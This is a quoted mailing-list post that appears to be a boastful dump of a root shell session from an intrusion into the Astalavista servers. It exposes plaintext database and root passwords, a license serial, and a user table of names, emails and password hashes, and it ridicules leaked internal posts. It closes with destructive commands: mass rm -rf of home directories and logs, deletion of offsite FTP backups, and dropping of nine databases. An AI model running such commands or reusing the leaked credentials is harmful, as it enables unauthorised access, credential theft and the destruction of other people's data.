> -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
> drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
>
> sh-3.2# cd ..
> sh-3.2# cd test
> sh-3.2# ls -la
> total 48
> drwx------ 2 jon jon 4096 Sep 15 2007 .
> drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
> -rw------- 1 jon jon 79 Sep 21 2007 .bash_history
> -rw-r--r-- 1 jon jon 24 Sep 15 2007 .bash_logout
> -rw-r--r-- 1 jon jon 176 Sep 15 2007 .bash_profile
> -rw-r--r-- 1 jon jon 124 Sep 15 2007 .bashrc
> sh-3.2# cat .bash_history
> /usr/bin/mysqladmin -u root password PoliuJhytg67
>
> sh-3.2# cd ..
> sh-3.2# cd astanet
> sh-3.2# ls -la
> total 52
> drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 .
> drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
> drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
> -rw------- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
> -rw-r--r-- 1 astanet astanet 33 Dec 17 21:50 .bash_logout
> -rw-r--r-- 1 astanet astanet 176 Dec 17 21:50 .bash_profile
> -rw-r--r-- 1 astanet astanet 124 Dec 17 21:50 .bashrc
> drwx--x--x 3 astanet astanet 4096 Dec 23 12:18 domains
> drwxrwx--- 3 astanet mail 4096 Dec 23 12:18 imap
> drwx------ 2 astanet astanet 4096 Dec 23 12:18 mail
> -rw------- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
> lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html ->
> ./domains/astalavista.net/public_html
> -rw-r----- 1 astanet mail 34 Dec 22 12:41 .shadow
>
> sh-3.2# cd auth/
> sh-3.2# ls -la
> total 28
> drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
> drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 ..
> -rw-r--r-- 1 root root 321 Jan 5 2006
> hackercontest.config.inc.php
> -rw-r--r-- 1 root root 319 Jan 5 2006
> hosting.config.inc.php
> -rw-r--r-- 1 root root 24 Jun 4 09:38 .htadm_pwd
> -rw-r--r-- 1 root root 49 Jan 5 2006 .htpasswd_newhosting
> -rw-r--r-- 1 root root 51 Oct 11 2006 .htwebalizer_pwd
>
> sh-3.2# cat hackercontest.config.inc.php
> <?PHP
> // Variabeln f?r Verbindung zur Datenbank //
> $conxHost = 'localhost'; // MySQL hostname
> $conxUser = 'hackercontest';
> // MySQL user
> $conxPassword = 'K6m@7dUc'; // MySQL password
> $bfkey = 'cXvB3981'; //
> Encryption/Decryption Key for Blowfish
> ?>
> sh-3.2# cat hosting.config.inc.php
> <?PHP
> // Variabeln f?r Verbindung zur Datenbank //
> $conxHost = 'localhost'; // MySQL hostname
> $conxUser = 'hostinguser'; // MySQL
> user
> $conxPassword = 'cXvB3981'; // MySQL password
> $bfkey = 'cXvB3981'; //
> Encryption/Decryption Key for Blowfish
> ?>
>
> sh-3.2# cd ..
> sh-3.2# cd com
> sh-3.2# ls -la
> total 141208
> drwx--x--x 10 com com 4096 Apr 28 12:40 .
> drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
> drwx------ 2 com com 4096 Jun 4 04:04 backups
> -rw-r--r-- 1 root root 2419504 Sep 28 2007 backup.sql
> drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
> -rw------- 1 com com 21880 Jun 2 08:07 .bash_history
> -rw-r--r-- 1 com com 24 Sep 24 2007 .bash_logout
> -rw-r--r-- 1 com com 176 Sep 24 2007 .bash_profile
> -rw-r--r-- 1 com com 124 Sep 24 2007 .bashrc
> drwx--x--x 3 com com 4096 Jan 29 2008 domains
> -rw-r--r-- 1 com com 16409 Jul 16 2008
> FWUser.class.php.fixed
> drwxrwx--- 3 com mail 4096 Jan 6 19:24 imap
> -rw------- 1 com com 69 Nov 18 2008 .lesshst
> drwx------ 2 com com 4096 Sep 24 2007 mail
> -rw------- 1 com com 13970 Mar 28 21:42 .mysql_history
> drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
> lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html ->
> ./domains/astalavista.com/public_html
> -rw-r----- 1 com mail 34 Sep 24 2007 .shadow
> drwx------ 2 com com 4096 Aug 26 2008 .ssh
> -rwx------ 1 com com 8515 Feb 10 2008 t
> -rw-rw-r-- 1 com com 6265 Feb 11 2008 t.c
> drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
> -rw-rw-r-- 1 com com 617 May 20 2008 .toprc
> -rw-rw-r-- 1 com com 141851766 May 19 2008 version2-backup-
> 20080519-0900.sql
> -rw------- 1 com com 16629 Mar 28 21:46 .viminfo
> -rw-rw-r-- 1 com com 51 Aug 25 2008 .vimrc
>
> sh-3.2# head t.c
> /*
> * jessica_biel_naked_in_my_bed.c
> *
> * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
> * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
> * Stejnak je to stare jak cyp a aj jakesyk rozbite.
> *
> * Linux vmsplice Local Root Exploit
> * By qaaz
> *
>
> sh-3.2# cd /
> sh-3.2# ls -la
> total 360
> drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
> drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
> -rw------- 1 root root 10240 Jun 3 02:39 aquota.group
> -rw------- 1 root root 10240 Jun 3 02:39 aquota.user
> -rw-r----- 1 root root 819 Jul 17 2008 astalavista.us.db
> -rw-r--r-- 1 root root 0 Jun 3 02:43 .autofsck
> -rw-r--r-- 1 root root 0 Sep 16 2007 .autorelabel
> drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
> drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
> drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
> drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
> drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
> drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
> -rw-r--r-- 1 root root 13387 Mar 20 2008 httpd.conf
> drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
> drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
> drwx------ 2 root root 16384 Sep 11 2007 lost+found
> drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
> drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
> drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
> -rw-r--r-- 1 root root 5859 Feb 3 2008 mrtg.cfg
> drwxr-xr-x 2 root root 0 Jun 3 02:43 net
> drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
> dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
> drwxr-x--- 15 root root 4096 Jun 4 08:40 root
> drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
> drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
> drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
> drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
> drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
> drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
> drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
>
> sh-3.2# cd opt
> sh-3.2# ls -la
> total 20
> drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
> drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
> drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
>
> sh-3.2# cd lsws/
> sh-3.2# ls -la
> total 108
> drwxr-xr-x 15 root root 4096 Mar 20 2008 .
> drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
> drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
> drwxr-xr-x 13 root root 4096 May 29 15:10 admin
> drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
> drwxr-xr-x 2 root root 4096 May 29 15:10 bin
> drwx------ 4 apache apache 4096 Jun 3 02:43 conf
> drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
> drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
> drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
> drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
> -rw-r--r-- 1 root root 6959 May 29 15:10 LICENSE
> -rw-r--r-- 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
> -rw-r--r-- 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
> -rw-r--r-- 1 root root 3208 May 29 15:10 LICENSE.PHP
> drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
> drwxr-xr-x 2 root root 4096 Mar 20 2008 php
> drwx------ 2 apache apache 4096 Mar 20 2008 phpbuild
> drwxr-xr-x 3 root root 4096 Mar 20 2008 share
> -rw-r--r-- 1 root root 6 May 29 15:10 VERSION
>
> sh-3.2# cd conf
> sh-3.2# ls -la
> total 48
> drwx------ 4 apache apache 4096 Jun 3 02:43 .
> drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
> drwx------ 2 apache apache 4096 Mar 20 2008 cert
> -rw-r--r-- 1 apache apache 6668 May 29 15:13 httpd_config.xml
> -rw------- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
> -rw-r--r-- 1 root apache 0 Jun 3 14:11 .last
> -rw------- 1 apache apache 256 May 29 15:10 license.key
> -rw------- 1 apache apache 256 Mar 21 2008 license.key.old
> -rw------- 1 apache apache 3320 Mar 20 2008 mime.properties
> -rw------- 1 apache apache 20 May 29 15:10 serial.no
> drwx------ 2 apache apache 4096 Mar 20 2008 templates
>
> sh-3.2# cat serial.no
> IbDl-oVsO-CKqL-wVRa
>
> sh-3.2# mysql
> Welcome to the MySQL monitor. Commands end with ; or \g.
> Your MySQL connection id is 286844
> Server version: 5.0.45-community-log MySQL Community Edition (GPL)
>
> Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
>
> mysql> show databases;
> +-----------------------+
> | Database |
> +-----------------------+
> | information_schema |
> | astanet_ads |
> | astanet_mailing_lists |
> | astanet_mediawiki |
> | astanet_membersystem |
> | com_contrexx |
> | com_contrexx2 |
> | com_contrexx2_live |
> | da_roundcube |
> | dolphin |
> | ideapool |
> | mysql |
> | test |
> | yourmaster |
> +-----------------------+
> 14 rows in set (0.00 sec)
>
> mysql> use ideapool
> Database changed
> mysql> show tables;
> +-----------------------------------+
> | Tables_in_ideapool |
> +-----------------------------------+
> | eventum_columns_to_display |
> | eventum_custom_field |
> | eventum_custom_field_option |
> | eventum_custom_filter |
> | eventum_customer_account_manager |
> | eventum_customer_note |
> | eventum_email_account |
> | eventum_email_draft |
> | eventum_email_draft_recipient |
> | eventum_email_response |
> | eventum_faq |
> | eventum_faq_support_level |
> | eventum_group |
> | eventum_history_type |
> | eventum_irc_notice |
> | eventum_issue |
> | eventum_issue_association |
> | eventum_issue_attachment |
> | eventum_issue_attachment_file |
> | eventum_issue_checkin |
> | eventum_issue_custom_field |
> | eventum_issue_history |
> | eventum_issue_quarantine |
> | eventum_issue_requirement |
> | eventum_issue_user |
> | eventum_issue_user_replier |
> | eventum_link_filter |
> | eventum_mail_queue |
> | eventum_mail_queue_log |
> | eventum_news |
> | eventum_note |
> | eventum_phone_support |
> | eventum_project |
> | eventum_project_category |
> | eventum_project_custom_field |
> | eventum_project_email_response |
> | eventum_project_field_display |
> | eventum_project_group |
> | eventum_project_link_filter |
> | eventum_project_news |
> | eventum_project_phone_category |
> | eventum_project_priority |
> | eventum_project_release |
> | eventum_project_round_robin |
> | eventum_project_status |
> | eventum_project_status_date |
> | eventum_project_user |
> | eventum_reminder_action |
> | eventum_reminder_action_list |
> | eventum_reminder_action_type |
> | eventum_reminder_field |
> | eventum_reminder_history |
> | eventum_reminder_level |
> | eventum_reminder_level_condition |
> | eventum_reminder_operator |
> | eventum_reminder_priority |
> | eventum_reminder_requirement |
> | eventum_reminder_triggered_action |
> | eventum_resolution |
> | eventum_round_robin_user |
> | eventum_search_profile |
> | eventum_status |
> | eventum_subscription |
> | eventum_subscription_type |
> | eventum_support_email |
> | eventum_support_email_body |
> | eventum_time_tracking |
> | eventum_time_tracking_category |
> | eventum_user |
> +-----------------------------------+
> 69 rows in set (0.00 sec)
>
> mysql> describe eventum_user;
> +-------------------------+------------------+------+-----+---------
> ------------+----------------+
> | Field | Type | Null | Key | Default
> | Extra |
> +-------------------------+------------------+------+-----+---------
> ------------+----------------+
> | usr_id | int(11) unsigned | NO | PRI | NULL
> | auto_increment |
> | usr_grp_id | int(11) unsigned | YES | MUL | NULL
> | |
> | usr_customer_id | int(11) unsigned | YES | | NULL
> | |
> | usr_customer_contact_id | int(11) unsigned | YES | | NULL
> | |
> | usr_created_date | datetime | NO | | 0000-00-
> 00 00:00:00 | |
> | usr_status | varchar(8) | NO | | active
> | |
> | usr_password | varchar(32) | NO | |
> | |
> | usr_full_name | varchar(255) | NO | |
> | |
> | usr_email | varchar(255) | NO | UNI |
> | |
> | usr_preferences | longtext | YES | | NULL
> | |
> | usr_sms_email | varchar(255) | YES | | NULL
> | |
> | usr_clocked_in | tinyint(1) | YES | | 0
> | |
> | usr_lang | varchar(5) | YES | | NULL
> | |
> +-------------------------+------------------+------+-----+---------
> ------------+----------------+
> 13 rows in set (0.00 sec)
>
> mysql> select usr_full_name,usr_email,usr_password from
> eventum_user;
> +----------------------+-------------------------------+------------
> ----------------------+
> | usr_full_name | usr_email |
> usr_password |
> +----------------------+-------------------------------+------------
> ----------------------+
> | system | system-account@xxxxxxxxxxx |
> 14589714398751513457adf349173434 |
> | Developer (Paulo) | paulo.santos@xxxxxxxxxxxxxx |
> 26a35a1cf8895c27fb37ef4cf149f7bb |
> | Be1er0ph0r | be1er0ph0r@xxxxxx |
> 229766dc0ca1fb67160a8782321dfdce |
> | Admin | pascal.mittner@xxxxxxxxxxxxxx |
> 57c2877c1d84c4b49f3289657deca65c |
> | ADMIN | admin@xxxxxxxxxxxxxx |
> f6fdffe48c908deb0f4c3bd36c032e72 |
> | USER | user@xxxxxxxxxxxxxx |
> 5cc32e366c87c4cb49e4309b75f57d64 |
> | Glafkos - (nowayout) | glafkos@xxxxxxxxxxxxxxx |
> f7735ab119023a8abb2301e67f81cd67 |
> | Joao | joao.pontes@xxxxxxxxxxxxxxx |
> f805c071d7c823b937448c54c047b9fd |
> | Pascal | pm@xxxxxxxxxxxxxx |
> e10adc3949ba59abbe56e057f20f883e |
> | commander | commander@xxxxxxxxxxxxxxx |
> 932cd250918f881d41feb0b93883a926 |
> | ishtus | ishtus@xxxxxxxxxxxxxxx |
> a587ffc88b3dbbba3fd2fe67af649ff0 |
> | sykadul | sykadul@xxxxxxxxxxxxxxx |
> 20224a2f3eeb57a13a10b4df543c128e |
> | Zach McElroy | admin@xxxxxxxxxx |
> 33c5d4954da881814420f3ba39772644 |
> | usb | usbenigma@xxxxxxxxxxxx |
> b513f22c3db6932855ad732f5f8a10a2 |
> | cyph3r | cyph3r@xxxxxxxxxxxxxxx |
> 6e1e50017a945e874d52ec91f9ab2cee |
> +----------------------+-------------------------------+------------
> ----------------------+
> 15 rows in set (0.00 sec)
>
> mysql> select iss_description from eventum_issue where iss_id = 43;
> +-------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------+
> | iss_description
>
>
>
>
>
>
>
>
> |
> +-------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------+
> | Ok guys, to boost our traffic and revenue what we have to do is
> keep users logged in... how to do that? well think about it... if a
> user is watching a movie... he'll be connected for 90 mins...
> 120mins... so what i propose is something like:
> http://www.surfthechannel.com/
> since they only provide LINKS to the movies they are LEGAL and
> don't break DMCA rules... so we could do the same... "iframe" the
> content on our website or use a system like podcast that uses our
> own flash player to stream content from other places, therefore the
> content NOT BEING HOSTED ON OUR SERVERS but only viewed... which
> doesn't break any laws as far as i am aware (we should research on
> that just to be sure though!) Of course we would have to provide
> users with the button to take the content off if they think it
> breaks copyright laws and we will remove it... i think that makes
> it on the border of DMCA...
>
> We could also put advertisement during play on the flash video
> player itself... extra $$...
>
> By sykadul |
> +-------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------+
> 1 row in set (0.00 sec)
>
> // Money and extra $$ is all they care about. remember that.
>
> mysql> select iss_summary,iss_description from eventum_issue where
> iss_id =42;
> +------------------------+------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> ---------------------------------------------------------+
> | iss_summary | iss_description
>
>
> |
> +------------------------+------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> ---------------------------------------------------------+
> | Forum for REAL EXPERTS | Hello,
>
> Ishtus and I,
>
> Came up with a crazy and very workable and
> professional idea.
> We create an invitation only forum with the BEST security experts
> worldwide ONLY. Security Experts from Bugtraq lists, exploit
> writters, reverse engineers etc..
>
> One example a friend of mine from
> coresecurity.com!
>
> We could have big projects etc.. and we can
> work all together
> to bring to the security community exploits, open source software
> etc..
>
> |
> +------------------------+------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------------------
> --------------------------------------------------------+
> 1 row in set (0.00 sec)
>
> // What an awesome yet original idea Ishtus and him... bring MORE
> security "experts", thats exactly what the world needs...
>
> mysql> select iss_summary,iss_description from eventum_issue where
> iss_id = 16;
> +------------------+------------------------------------------------
> ---------------------------------------------+
> | iss_summary | iss_description
> |
> +------------------+------------------------------------------------
> ---------------------------------------------+
> | Website guidance | Virtual Girl which guides you trought the
> website.
>
> We need a girl with who you can ( talk )!!!
> Also for the News!
> So my suggestion is a girl who read you the news
> loud if you
> like!
> you can choose between read yourselfe or she read it
> for you or
> both!
>
> Go to www.heise.de! There is an example for Voice
> News! It's a
> good thing!!!
>
> Have a look on the example girls!!
>
> http://www.yaoti.com/de/free_yaoti.html
>
> or that
>
> http://www.yellostrom.de/
>
> |
> +------------------+------------------------------------------------
> ---------------------------------------------+
> 1 row in set (0.00 sec)
>
> // ha ha.
>
> mysql> select iss_summary,iss_description from eventum_issue where
> iss_id = 7;
> +--------------------------+----------------------------------------
> -------------------------------------------------------------------+
> | iss_summary | iss_description
> |
> +--------------------------+----------------------------------------
> -------------------------------------------------------------------+
> | Exploit Development Team | We need an exploit development team to
> focus on exploit research and publication under Astalavista name. |
> +--------------------------+----------------------------------------
> -------------------------------------------------------------------+
> 1 row in set (0.00 sec)
>
> // LOL.
>
> mysql> exit
> Bye
>
>
> sh-3.2# ftp 212.254.194.163
> Connected to 212.254.194.163.
> 220 BackupCOM_VW FTP server ready.
> 504 AUTH: security mechanism 'GSSAPI' not supported.
> 504 AUTH: security mechanism 'KERBEROS_V4' not supported.
> KERBEROS_V4 rejected as an authentication type
> Name (212.254.194.163:root): astalavista.com
> 331 Password required for astalavista.com.
> Password:
> 230 User astalavista.com logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> ls -la
> 227 Entering Passive Mode (212,254,194,163,2,188)
> 150 Opening BINARY mode data connection for 'file list'.
> dr-x------ 1 root users 4096 Jun 4 06:13 astalavista.com
> 226 Transfer complete.
> ftp> cd astalavista.com
> 250 CWD command successful.
> ftp> ls -la
> 227 Entering Passive Mode (212,254,194,163,2,189)
> 150 Opening BINARY mode data connection for 'file list'.
> -rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10
> 09-04-28-astacom_full.tar
> -rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18
> 09-04-28-astacom_full.tar.bz2
> -rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57
> 09-04-29-astacom_sql_full.sql.tar.bz2
> -rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21
> 09-05-01-astacom-Public_HTML.tar
> -rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29
> 09-05-01-astacom-SQL_Dump.tar
> [snip]
> 226 Transfer complete.
> ftp> mdelete *
> ftp> ls -la
> 227 Entering Passive Mode (212,254,194,163,2,193)
> 150 Opening BINARY mode data connection for 'file list'.
> 226 Transfer complete.
> ftp>
>
> sh-3.2# cd /home
> sh-3.2# ls -la
> total 120
> drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
> drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
> drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
> -rw------- 1 root root 8192 Jun 4 03:03 aquota.group
> -rw------- 1 root root 8192 Jun 3 02:45 aquota.user
> drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
> drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
> drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
> drwx--x--x 10 com com 4096 Apr 28 12:40 com
> drwxr-xr-x 2 root root 4096 May 17 2007 ftp
> drwx------ 3 jon jon 4096 Sep 21 2007 jon
> drwx------ 2 root root 16384 Sep 11 2007 lost+found
> drwxr-xr-x 2 root root 4096 Sep 14 2007 my
> drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
> drwx------ 2 jon jon 4096 Sep 15 2007 test
> drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
>
> sh-3.2# rm -rf backup/
> sh-3.2# rm -rf backup.14161/
> sh-3.2# rm -rf ftp/
> sh-3.2# rm -rf jon/
> sh-3.2# rm -rf my/
> sh-3.2# rm -rf mysqldata/
> sh-3.2# rm -rf test/
> sh-3.2# rm -rf tmp/
> sh-3.2# cd ~
> sh-3.2# rm -rf *
> sh-3.2# rm -rf /var/log/
> rm: cannot remove directory `/var/log//proftpd': Directory not empty
> sh-3.2# rm -rf /home/*
> sh-3.2# mysql
> Welcome to the MySQL monitor. Commands end with ; or \g.
> Your MySQL connection id is 407156
> Server version: 5.0.45-community-log MySQL Community Edition (GPL)
>
> Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
>
> mysql> show databases;
> +-----------------------+
> | Database |
> +-----------------------+
> | information_schema |
> | astanet_ads |
> | astanet_mailing_lists |
> | astanet_mediawiki |
> | astanet_membersystem |
> | com_contrexx |
> | com_contrexx2 |
> | com_contrexx2_live |
> | da_roundcube |
> | dolphin |
> | ideapool |
> | mysql |
> | test |
> | yourmaster |
> +-----------------------+
> 14 rows in set (0.03 sec)
>
> mysql> drop database astanet_membersystem;
> droQuery OK, 46 rows affected (0.81 sec)
>
> mysql> drop database com_contrexx;
> Query OK, 211 rows affected (2.72 sec)
>
> mysql> drop database com_contrexx2;
> Query OK, 237 rows affected (2.23 sec)
>
> mysql> drop database com_contrexx2_live;
> Query OK, 227 rows affected (7.63 sec)
>
> mysql> drop database ideapool;
> Query OK, 69 rows affected (0.19 sec)
>
> mysql> drop database yourmaster;
> Query OK, 158 rows affected (0.55 sec)
>
> mysql> drop database astanet_ads;
> Query OK, 9 rows affected (0.11 sec)
>
> mysql> drop database astanet_mailing_lists;
> Query OK, 24 rows affected (1.47 sec)
>
> mysql> drop database astanet_mediawiki;
> Query OK, 31 rows affected (0.51 sec)
>
> mysql> show databases;
> +--------------------+
> | Database |
> +--------------------+
> | information_schema |
> | da_roundcube |
> | dolphin |
> | mysql |
> | test |
> +--------------------+
> 5 rows in set (0.00 sec)
>
>
> What a journey! We're not sure exactly why the "Terminator" had any
> influence on
> their naming (conventions) but we're sure Arnold himself wouldn't
> be in the
> wrong to say this pack of morons *wont be back*.
>
> --
> Explore Africa with a luxurious safari vacation. Click now!
>
> http://tagline.hushmail.com/fc/BLSrjkqibJ4YFlT0yWUQGlcnCi5pjZKvouw2zmCrKTyocKlZVTVGpO7c11G/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/